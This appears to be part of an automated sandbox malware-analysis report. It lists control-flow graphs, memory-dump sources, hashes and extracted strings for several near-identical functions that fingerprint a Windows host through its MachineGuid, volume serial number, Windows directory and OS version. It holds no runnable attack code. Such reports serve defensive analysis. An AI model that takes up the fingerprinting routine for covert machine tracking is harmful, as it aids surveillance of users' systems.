                                                                                                                                                  control_flow_graph 309 7ff8b9159770-7ff8b915978a call 7ff8b915cf94 312 7ff8b9159790-7ff8b91597a5 call 7ff8b915cf13 309->312 313 7ff8b9159ca2 309->313 317 7ff8b91597fb 312->317 318 7ff8b91597a7-7ff8b91597d5 312->318 316 7ff8b9159cb6-7ff8b9159cbb 313->316 319 7ff8b915980d-7ff8b9159824 call 7ff8b9151292 316->319 320 7ff8b9159800-7ff8b915980b FreeLibrary 317->320 327 7ff8b91597de-7ff8b91597f9 call 7ff8b9151292 318->327 328 7ff8b91597d7-7ff8b91597dc 318->328 324 7ff8b9159829-7ff8b9159836 319->324 320->319 323 7ff8b9159837-7ff8b9159870 GetNativeSystemInfo GetWindowsDirectoryA 320->323 325 7ff8b915994e-7ff8b9159971 call 7ff8b9151292 323->325 326 7ff8b9159876-7ff8b9159897 GetLastError call 7ff8b9151292 323->326 325->319 337 7ff8b9159977-7ff8b91599ad call 7ff8b915b0e2 325->337 335 7ff8b9159899 326->335 336 7ff8b91598b7-7ff8b91598bd 326->336 327->320 328->320 338 7ff8b91598ad-7ff8b91598b2 335->338 339 7ff8b915989b-7ff8b91598a8 335->339 336->316 341 7ff8b91598c3-7ff8b91598c9 336->341 347 7ff8b9159a5e-7ff8b9159a7a call 7ff8b9151292 337->347 348 7ff8b91599b3-7ff8b91599b5 337->348 338->319 339->338 343 7ff8b91598cb-7ff8b91598ce 341->343 344 7ff8b9159902-7ff8b9159908 341->344 349 7ff8b91598ec-7ff8b91598f2 343->349 350 7ff8b91598d0-7ff8b91598d3 343->350 345 7ff8b9159cde-7ff8b9159ce3 344->345 346 7ff8b915990e-7ff8b9159914 344->346 345->319 351 7ff8b9159ce8-7ff8b9159ced 346->351 352 7ff8b915991a-7ff8b9159920 346->352 361 7ff8b9159a7f 347->361 348->319 354 7ff8b91599bb-7ff8b9159a18 GetVolumeInformationA 348->354 357 7ff8b91598f8-7ff8b91598fd 349->357 358 7ff8b9159cd4-7ff8b9159cd9 349->358 355 7ff8b91598d9-7ff8b91598dc 350->355 356 7ff8b9159cc0-7ff8b9159cc5 350->356 351->319 359 7ff8b9159926-7ff8b915992b 352->359 360 7ff8b9159cf2-7ff8b9159cf7 352->360 362 7ff8b9159a1e-7ff8b9159a44 GetLastError call 7ff8b9151292 354->362 363 7ff8b9159b1b-7ff8b9159b4d call 7ff8b9151292 354->363 364 7ff8b9159cca-7ff8b9159ccf 355->364 365 7ff8b91598e2-7ff8b91598e7 355->365 356->319 357->319 358->319 359->319 360->319 361->348 372 7ff8b9159a84-7ff8b9159a8a 362->372 373 7ff8b9159a46 362->373 370 7ff8b9159b4f-7ff8b9159b5b strlen 363->370 371 7ff8b9159b61-7ff8b9159b68 363->371 364->319 365->319 370->371 376 7ff8b9159c23-7ff8b9159c27 370->376 379 7ff8b9159b6c-7ff8b9159bc9 call 7ff8b9151292 371->379 377 7ff8b9159be7-7ff8b9159bec 372->377 378 7ff8b9159a90 372->378 374 7ff8b9159a4c-7ff8b9159a59 373->374 375 7ff8b9159bd3-7ff8b9159bd8 373->375 374->347 375->319 376->371 380 7ff8b9159c2d-7ff8b9159c31 376->380 377->319 381 7ff8b9159ac9-7ff8b9159acf 378->381 382 7ff8b9159a92-7ff8b9159a95 378->382 387 7ff8b9159bce 379->387 380->371 384 7ff8b9159c37-7ff8b9159c6a _errno call 7ff8b9162ab8 _errno 380->384 388 7ff8b9159c0f-7ff8b9159c14 381->388 389 7ff8b9159ad5-7ff8b9159adb 381->389 385 7ff8b9159a97-7ff8b9159a9a 382->385 386 7ff8b9159ab3-7ff8b9159ab9 382->386 402 7ff8b9159c6c-7ff8b9159c6f 384->402 403 7ff8b9159c7a-7ff8b9159c9d _errno call 7ff8b9151292 384->403 391 7ff8b9159bf1-7ff8b9159bf6 385->391 392 7ff8b9159aa0-7ff8b9159aa3 385->392 393 7ff8b9159abf-7ff8b9159ac4 386->393 394 7ff8b9159c05-7ff8b9159c0a 386->394 387->324 388->319 395 7ff8b9159c19-7ff8b9159c1e 389->395 396 7ff8b9159ae1-7ff8b9159ae7 389->396 391->319 400 7ff8b9159aa9-7ff8b9159aae 392->400 401 7ff8b9159bfb-7ff8b9159c00 392->401 393->319 394->319 395->319 397 7ff8b9159ae9-7ff8b9159aee 396->397 398 7ff8b9159af3-7ff8b9159af8 396->398 397->319 398->319 400->319 401->319 402->379 404 7ff8b9159c75 402->404 403->371 404->371
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                                                                                                                                                  • Instruction ID: 57d204d98a844dc10ff390f7b1ba0b97585744d8058b5b50d930e206ccf40b2a
                                                                                                                                                  • Opcode Fuzzy Hash: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                                                                                                                                                  • Instruction Fuzzy Hash: 09D15965E0C7D781FB218F1DE8403B862A0AF417D4F964032DB5E472A6DE2DF884B792
                                                                                                                                                  Function 00007FF8B918E870 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 407 7ff8b918e870-7ff8b918e88a call 7ff8b9181aa4 410 7ff8b918e890-7ff8b918e8a5 call 7ff8b9181a23 407->410 411 7ff8b918eda2 407->411 416 7ff8b918e8a7-7ff8b918e8d5 410->416 417 7ff8b918e8fb 410->417 413 7ff8b918edb6-7ff8b918edbb 411->413 415 7ff8b918e90d-7ff8b918e924 call 7ff8b9181292 413->415 422 7ff8b918e929-7ff8b918e936 415->422 423 7ff8b918e8d7-7ff8b918e8dc 416->423 424 7ff8b918e8de-7ff8b918e8f9 call 7ff8b9181292 416->424 418 7ff8b918e900-7ff8b918e90b FreeLibrary 417->418 418->415 421 7ff8b918e937-7ff8b918e970 GetNativeSystemInfo GetWindowsDirectoryA 418->421 425 7ff8b918e976-7ff8b918e997 GetLastError call 7ff8b9181292 421->425 426 7ff8b918ea4e-7ff8b918ea71 call 7ff8b9181292 421->426 423->418 424->418 434 7ff8b918e9b7-7ff8b918e9bd 425->434 435 7ff8b918e999 425->435 426->415 433 7ff8b918ea77-7ff8b918eaad call 7ff8b9182472 426->433 443 7ff8b918eab3-7ff8b918eab5 433->443 444 7ff8b918eb5e-7ff8b918eb7a call 7ff8b9181292 433->444 434->413 437 7ff8b918e9c3-7ff8b918e9c9 434->437 438 7ff8b918e99b-7ff8b918e9a8 435->438 439 7ff8b918e9ad-7ff8b918e9b2 435->439 441 7ff8b918ea02-7ff8b918ea08 437->441 442 7ff8b918e9cb-7ff8b918e9ce 437->442 438->439 439->415 447 7ff8b918edde-7ff8b918ede3 441->447 448 7ff8b918ea0e-7ff8b918ea14 441->448 445 7ff8b918e9d0-7ff8b918e9d3 442->445 446 7ff8b918e9ec-7ff8b918e9f2 442->446 443->415 449 7ff8b918eabb-7ff8b918eb18 GetVolumeInformationA 443->449 463 7ff8b918eb7f 444->463 450 7ff8b918edc0-7ff8b918edc5 445->450 451 7ff8b918e9d9-7ff8b918e9dc 445->451 452 7ff8b918edd4-7ff8b918edd9 446->452 453 7ff8b918e9f8-7ff8b918e9fd 446->453 447->415 454 7ff8b918ede8-7ff8b918eded 448->454 455 7ff8b918ea1a-7ff8b918ea20 448->455 457 7ff8b918ec1b-7ff8b918ec4d call 7ff8b9181292 449->457 458 7ff8b918eb1e-7ff8b918eb44 GetLastError call 7ff8b9181292 449->458 450->415 459 7ff8b918e9e2-7ff8b918e9e7 451->459 460 7ff8b918edca-7ff8b918edcf 451->460 452->415 453->415 454->415 461 7ff8b918edf2-7ff8b918edf7 455->461 462 7ff8b918ea26-7ff8b918ea2b 455->462 470 7ff8b918ec61-7ff8b918ec68 457->470 471 7ff8b918ec4f-7ff8b918ec5b strlen 457->471 468 7ff8b918eb84-7ff8b918eb8a 458->468 469 7ff8b918eb46 458->469 459->415 460->415 461->415 462->415 463->443 472 7ff8b918eb90 468->472 473 7ff8b918ece7-7ff8b918ecec 468->473 476 7ff8b918ecd3-7ff8b918ecd8 469->476 477 7ff8b918eb4c-7ff8b918eb59 469->477 475 7ff8b918ec6c-7ff8b918ecc9 call 7ff8b9181292 470->475 471->470 474 7ff8b918ed23-7ff8b918ed27 471->474 478 7ff8b918eb92-7ff8b918eb95 472->478 479 7ff8b918ebc9-7ff8b918ebcf 472->479 473->415 474->470 481 7ff8b918ed2d-7ff8b918ed31 474->481 484 7ff8b918ecce 475->484 476->415 477->444 482 7ff8b918ebb3-7ff8b918ebb9 478->482 483 7ff8b918eb97-7ff8b918eb9a 478->483 485 7ff8b918ebd5-7ff8b918ebdb 479->485 486 7ff8b918ed0f-7ff8b918ed14 479->486 481->470 487 7ff8b918ed37-7ff8b918ed6a _errno call 7ff8b91946f0 _errno 481->487 490 7ff8b918ed05-7ff8b918ed0a 482->490 491 7ff8b918ebbf-7ff8b918ebc4 482->491 488 7ff8b918eba0-7ff8b918eba3 483->488 489 7ff8b918ecf1-7ff8b918ecf6 483->489 484->422 492 7ff8b918ebe1-7ff8b918ebe7 485->492 493 7ff8b918ed19-7ff8b918ed1e 485->493 486->415 500 7ff8b918ed7a-7ff8b918ed9d _errno call 7ff8b9181292 487->500 501 7ff8b918ed6c-7ff8b918ed6f 487->501 495 7ff8b918eba9-7ff8b918ebae 488->495 496 7ff8b918ecfb-7ff8b918ed00 488->496 489->415 490->415 491->415 497 7ff8b918ebf3-7ff8b918ebf8 492->497 498 7ff8b918ebe9-7ff8b918ebee 492->498 493->415 495->415 496->415 497->415 498->415 500->470 501->475 502 7ff8b918ed75 501->502 502->470
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                                                                                                                                                  • Instruction ID: b3bf22cab428c52db068d7083d2ad9d40cce2f7d42920e4353f3dfbedd385ec5
                                                                                                                                                  • Opcode Fuzzy Hash: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                                                                                                                                                  • Instruction Fuzzy Hash: F4D18D21E0C6D682FA60EF1CE4843B87A95AF417E4F564132CB9E072A2DE6DAC45B741
                                                                                                                                                  Function 00007FF8BFB54430 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 701 7ff8bfb54430-7ff8bfb5444a call 7ff8bfb52174 704 7ff8bfb54450-7ff8bfb54465 call 7ff8bfb520f3 701->704 705 7ff8bfb54962 701->705 710 7ff8bfb544bb 704->710 711 7ff8bfb54467-7ff8bfb54495 704->711 707 7ff8bfb54976-7ff8bfb5497b 705->707 709 7ff8bfb544cd-7ff8bfb544e4 call 7ff8bfb52fd2 707->709 715 7ff8bfb544e9-7ff8bfb544f6 709->715 712 7ff8bfb544c0-7ff8bfb544cb FreeLibrary 710->712 719 7ff8bfb5449e-7ff8bfb544b9 call 7ff8bfb52fd2 711->719 720 7ff8bfb54497-7ff8bfb5449c 711->720 712->709 714 7ff8bfb544f7-7ff8bfb54530 GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ff8bfb5460e-7ff8bfb54631 call 7ff8bfb52fd2 714->717 718 7ff8bfb54536-7ff8bfb54557 GetLastError call 7ff8bfb52fd2 714->718 717->709 729 7ff8bfb54637-7ff8bfb5466d call 7ff8bfb59702 717->729 727 7ff8bfb54559 718->727 728 7ff8bfb54577-7ff8bfb5457d 718->728 719->712 720->712 730 7ff8bfb5456d-7ff8bfb54572 727->730 731 7ff8bfb5455b-7ff8bfb54568 727->731 728->707 733 7ff8bfb54583-7ff8bfb54589 728->733 737 7ff8bfb5471e-7ff8bfb5473a call 7ff8bfb52fd2 729->737 738 7ff8bfb54673-7ff8bfb54675 729->738 730->709 731->730 734 7ff8bfb5458b-7ff8bfb5458e 733->734 735 7ff8bfb545c2-7ff8bfb545c8 733->735 739 7ff8bfb545ac-7ff8bfb545b2 734->739 740 7ff8bfb54590-7ff8bfb54593 734->740 741 7ff8bfb5499e-7ff8bfb549a3 735->741 742 7ff8bfb545ce-7ff8bfb545d4 735->742 757 7ff8bfb5473f 737->757 738->709 743 7ff8bfb5467b-7ff8bfb546d8 GetVolumeInformationA 738->743 746 7ff8bfb545b8-7ff8bfb545bd 739->746 747 7ff8bfb54994-7ff8bfb54999 739->747 744 7ff8bfb54599-7ff8bfb5459c 740->744 745 7ff8bfb54980-7ff8bfb54985 740->745 741->709 748 7ff8bfb549a8-7ff8bfb549ad 742->748 749 7ff8bfb545da-7ff8bfb545e0 742->749 751 7ff8bfb546de-7ff8bfb54704 GetLastError call 7ff8bfb52fd2 743->751 752 7ff8bfb547db-7ff8bfb5480d call 7ff8bfb52fd2 743->752 753 7ff8bfb5498a-7ff8bfb5498f 744->753 754 7ff8bfb545a2-7ff8bfb545a7 744->754 745->709 746->709 747->709 748->709 755 7ff8bfb545e6-7ff8bfb545eb 749->755 756 7ff8bfb549b2-7ff8bfb549b7 749->756 762 7ff8bfb54744-7ff8bfb5474a 751->762 763 7ff8bfb54706 751->763 764 7ff8bfb5480f-7ff8bfb5481b strlen 752->764 765 7ff8bfb54821-7ff8bfb54828 752->765 753->709 754->709 755->709 756->709 757->738 768 7ff8bfb548a7-7ff8bfb548ac 762->768 769 7ff8bfb54750 762->769 766 7ff8bfb5470c-7ff8bfb54719 763->766 767 7ff8bfb54893-7ff8bfb54898 763->767 764->765 770 7ff8bfb548e3-7ff8bfb548e7 764->770 771 7ff8bfb5482c-7ff8bfb54889 call 7ff8bfb52fd2 765->771 766->737 767->709 768->709 773 7ff8bfb54789-7ff8bfb5478f 769->773 774 7ff8bfb54752-7ff8bfb54755 769->774 770->765 772 7ff8bfb548ed-7ff8bfb548f1 770->772 781 7ff8bfb5488e 771->781 772->765 778 7ff8bfb548f7-7ff8bfb5492a _errno call 7ff8bfb60c38 _errno 772->778 776 7ff8bfb548cf-7ff8bfb548d4 773->776 777 7ff8bfb54795-7ff8bfb5479b 773->777 779 7ff8bfb54757-7ff8bfb5475a 774->779 780 7ff8bfb54773-7ff8bfb54779 774->780 776->709 784 7ff8bfb548d9-7ff8bfb548de 777->784 785 7ff8bfb547a1-7ff8bfb547a7 777->785 794 7ff8bfb5492c-7ff8bfb5492f 778->794 795 7ff8bfb5493a-7ff8bfb5495d _errno call 7ff8bfb52fd2 778->795 787 7ff8bfb54760-7ff8bfb54763 779->787 788 7ff8bfb548b1-7ff8bfb548b6 779->788 782 7ff8bfb5477f-7ff8bfb54784 780->782 783 7ff8bfb548c5-7ff8bfb548ca 780->783 781->715 782->709 783->709 784->709 791 7ff8bfb547a9-7ff8bfb547ae 785->791 792 7ff8bfb547b3-7ff8bfb547b8 785->792 789 7ff8bfb54769-7ff8bfb5476e 787->789 790 7ff8bfb548bb-7ff8bfb548c0 787->790 788->709 789->709 790->709 791->709 792->709 794->771 796 7ff8bfb54935 794->796 795->765 796->765
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                                                                                                  • Instruction ID: 5e24a748ca0a910ce2c7f30d5d750ac1344da967546ca05caaa87a91743d58c4
                                                                                                                                                  • Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                                                                                                  • Instruction Fuzzy Hash: 4BD15B62E0C656D5FA249BDCE4723B9B7A0AF407D8F194132CB4E477A4DE2CF8848781
                                                                                                                                                  Function 00007FF8BFB32610 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 603 7ff8bfb32610-7ff8bfb3262a call 7ff8bfb37474 606 7ff8bfb32b42 603->606 607 7ff8bfb32630-7ff8bfb32645 call 7ff8bfb373f3 603->607 610 7ff8bfb32b56-7ff8bfb32b5b 606->610 611 7ff8bfb3269b 607->611 612 7ff8bfb32647-7ff8bfb32675 607->612 613 7ff8bfb326ad-7ff8bfb326c4 call 7ff8bfb3a202 610->613 614 7ff8bfb326a0-7ff8bfb326ab FreeLibrary 611->614 619 7ff8bfb3267e-7ff8bfb32699 call 7ff8bfb3a202 612->619 620 7ff8bfb32677-7ff8bfb3267c 612->620 618 7ff8bfb326c9-7ff8bfb326d6 613->618 614->613 617 7ff8bfb326d7-7ff8bfb32710 GetNativeSystemInfo GetWindowsDirectoryA 614->617 621 7ff8bfb327ee-7ff8bfb32811 call 7ff8bfb3a202 617->621 622 7ff8bfb32716-7ff8bfb32737 GetLastError call 7ff8bfb3a202 617->622 619->614 620->614 621->613 631 7ff8bfb32817-7ff8bfb3284d call 7ff8bfb37e42 621->631 629 7ff8bfb32739 622->629 630 7ff8bfb32757-7ff8bfb3275d 622->630 632 7ff8bfb3273b-7ff8bfb32748 629->632 633 7ff8bfb3274d-7ff8bfb32752 629->633 630->610 635 7ff8bfb32763-7ff8bfb32769 630->635 639 7ff8bfb328fe-7ff8bfb3291a call 7ff8bfb3a202 631->639 640 7ff8bfb32853-7ff8bfb32855 631->640 632->633 633->613 637 7ff8bfb3276b-7ff8bfb3276e 635->637 638 7ff8bfb327a2-7ff8bfb327a8 635->638 641 7ff8bfb3278c-7ff8bfb32792 637->641 642 7ff8bfb32770-7ff8bfb32773 637->642 643 7ff8bfb32b7e-7ff8bfb32b83 638->643 644 7ff8bfb327ae-7ff8bfb327b4 638->644 655 7ff8bfb3291f 639->655 640->613 646 7ff8bfb3285b-7ff8bfb328b8 GetVolumeInformationA 640->646 649 7ff8bfb32798-7ff8bfb3279d 641->649 650 7ff8bfb32b74-7ff8bfb32b79 641->650 647 7ff8bfb32779-7ff8bfb3277c 642->647 648 7ff8bfb32b60-7ff8bfb32b65 642->648 643->613 651 7ff8bfb327ba-7ff8bfb327c0 644->651 652 7ff8bfb32b88-7ff8bfb32b8d 644->652 656 7ff8bfb329bb-7ff8bfb329ed call 7ff8bfb3a202 646->656 657 7ff8bfb328be-7ff8bfb328e4 GetLastError call 7ff8bfb3a202 646->657 658 7ff8bfb32b6a-7ff8bfb32b6f 647->658 659 7ff8bfb32782-7ff8bfb32787 647->659 648->613 649->613 650->613 653 7ff8bfb32b92-7ff8bfb32b97 651->653 654 7ff8bfb327c6-7ff8bfb327cb 651->654 652->613 653->613 654->613 655->640 664 7ff8bfb329ef-7ff8bfb329fb strlen 656->664 665 7ff8bfb32a01-7ff8bfb32a08 656->665 666 7ff8bfb328e6 657->666 667 7ff8bfb32924-7ff8bfb3292a 657->667 658->613 659->613 664->665 668 7ff8bfb32ac3-7ff8bfb32ac7 664->668 671 7ff8bfb32a0c-7ff8bfb32a69 call 7ff8bfb3a202 665->671 672 7ff8bfb328ec-7ff8bfb328f9 666->672 673 7ff8bfb32a73-7ff8bfb32a78 666->673 669 7ff8bfb32930 667->669 670 7ff8bfb32a87-7ff8bfb32a8c 667->670 668->665 677 7ff8bfb32acd-7ff8bfb32ad1 668->677 674 7ff8bfb32969-7ff8bfb3296f 669->674 675 7ff8bfb32932-7ff8bfb32935 669->675 670->613 681 7ff8bfb32a6e 671->681 672->639 673->613 682 7ff8bfb32aaf-7ff8bfb32ab4 674->682 683 7ff8bfb32975-7ff8bfb3297b 674->683 679 7ff8bfb32953-7ff8bfb32959 675->679 680 7ff8bfb32937-7ff8bfb3293a 675->680 677->665 678 7ff8bfb32ad7-7ff8bfb32b0a _errno call 7ff8bfb3ecb8 _errno 677->678 696 7ff8bfb32b1a-7ff8bfb32b3d _errno call 7ff8bfb3a202 678->696 697 7ff8bfb32b0c-7ff8bfb32b0f 678->697 687 7ff8bfb3295f-7ff8bfb32964 679->687 688 7ff8bfb32aa5-7ff8bfb32aaa 679->688 685 7ff8bfb32940-7ff8bfb32943 680->685 686 7ff8bfb32a91-7ff8bfb32a96 680->686 681->618 682->613 689 7ff8bfb32ab9-7ff8bfb32abe 683->689 690 7ff8bfb32981-7ff8bfb32987 683->690 692 7ff8bfb32a9b-7ff8bfb32aa0 685->692 693 7ff8bfb32949-7ff8bfb3294e 685->693 686->613 687->613 688->613 689->613 694 7ff8bfb32989-7ff8bfb3298e 690->694 695 7ff8bfb32993-7ff8bfb32998 690->695 692->613 693->613 694->613 695->613 696->665 697->671 698 7ff8bfb32b15 697->698 698->665
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                                                                                                                                                  • Instruction ID: c8acf4676f9279219e33657c2128e3d87b3181e9e905a3aa8b9e677f0e219a56
                                                                                                                                                  • Opcode Fuzzy Hash: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                                                                                                                                                  • Instruction Fuzzy Hash: 52D14A66EDC66782FB209B9CE9403B973A0AF44BD4F554032CB4E17AA5DE3DEC848741
                                                                                                                                                  Function 00007FF6BE0393F0 Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

